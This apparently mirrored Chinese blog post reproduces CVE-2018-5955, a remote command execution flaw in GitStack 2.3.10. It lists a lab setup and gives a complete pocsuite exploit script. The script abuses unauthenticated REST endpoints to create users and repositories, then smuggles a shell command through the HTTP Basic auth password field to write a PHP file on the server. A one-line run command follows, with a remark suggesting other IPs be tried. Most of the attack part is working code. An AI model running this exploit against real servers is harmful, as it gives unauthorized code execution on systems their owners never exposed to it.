zoukankan      html  css  js  c++  java
  • CVE-2018-5955 漏洞复现

    系统 安装软件
    Windows 7 GitStack 2.3.10
    kali linux python
    pocsuite

    GitStack 2.3.10中文版下载

    一路回车安装完成

    安装完成后,将浏览器启动到http://localhost/gitstack

    CVE-2018-5955.py

    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    # from pocsuite.api.request import req
    from pocsuite.api.poc import register
    from pocsuite.api.poc import Output, POCBase
    import requests
    import random
    import os
    import sys
    import hashlib
    import string
    from requests.auth import HTTPBasicAuth
    
    
    class TestPOC(POCBase):
        vulID = 'N/A'
        version = 'GitStack <= 2.3.10'
        author = 'co0ontty'
        vulDate = '2019-7-11'
        createDate = '2019-7-16'
        updateDate = '2018-3-31'
        references = ['https://xz.aliyun.com/t/2235']
        name = 'GitStack <= 2.3.10 远程命令执行漏洞分析'
        appPowerLink = 'https://gitstack.com'
        appName = 'GitStack'
        appVersion = 'GitStack <= 2.3.10'
        vulType = '文件上传'
        desc = '''
        该漏洞利用GitStack正常使用过程中调用的接口的未授权访问漏洞,越权读取、创建、修改用户列表、仓库。通过进一步利用实现恶意文件的上传。
        '''
        samples = []
        install_requires = []
    
        def _verify(self):
            result = {}
            target = self.url
            repository = 'rce'
            username = 'rce'
            password = 'rce'
            csrf_token = 'token'
            user_list = []
            r = requests.get("{}/rest/user/".format(target))
            try:
                user_list = r.json()
                user_list.remove('everyone')
            except:
                pass
            if len(user_list) > 0:
                username = user_list[0]
            else:
                r = requests.post("{}/rest/user/".format(target),data={'username' : username, 'password' : password})
            r = requests.get("{}/rest/repository/".format(target))
            repository_list = r.json()
            if len(repository_list) > 0:
                repository = repository_list[0]['name']
            r = requests.post("{}/rest/repository/".format(target), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
            r = requests.post("{}/rest/repository/{}/user/{}/".format(target, repository, username))
            r = requests.delete("{}/rest/repository/{}/user/{}/".format(target, repository, "everyone"))
            random_file_name = ''.join(random.sample(string.ascii_letters+string.digits,16))+".php"
            random_identify_code = ''.join(random.sample(string.ascii_letters+string.digits,35))
            r = requests.get('{}/web/index.php?p={}.git&a=summary'.format(target, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php echo"'+random_identify_code+'"; ?>" > c:'+random_file_name))
            test_url = target+"/web/"+random_file_name
            r = requests.get(test_url)
            if (r.status_code == 200)&(random_identify_code in r.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                pass
            return self.parse_output(result)
    
        _attack = _verify
    
        def parse_output(self, result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('Internet nothing returned')
            return output
    
    
    register(TestPOC)
    
      pocsuite -r CVE-2018-5955.py -u ip
    

    • 可以切换其他无靶的ip试试
  • 相关阅读:
    第5章 简单的C程序设计——循环结构程序设计
    第4章 简单的C程序设计——选择结构程序设计
    通过wget工具下载指定文件中的URLs对应的资源并保存到指定的本地目录中去并进行文件完整性与可靠性校验
    Kaflka介绍
    分布式与集群
    Golang菜鸟教程day01
    优秀的github项目
    Golang教程
    windows下安装GDB
    nginx部署
  • 原文地址:https://www.cnblogs.com/jiangyatao/p/13371564.html
Copyright © 2011-2022 走看看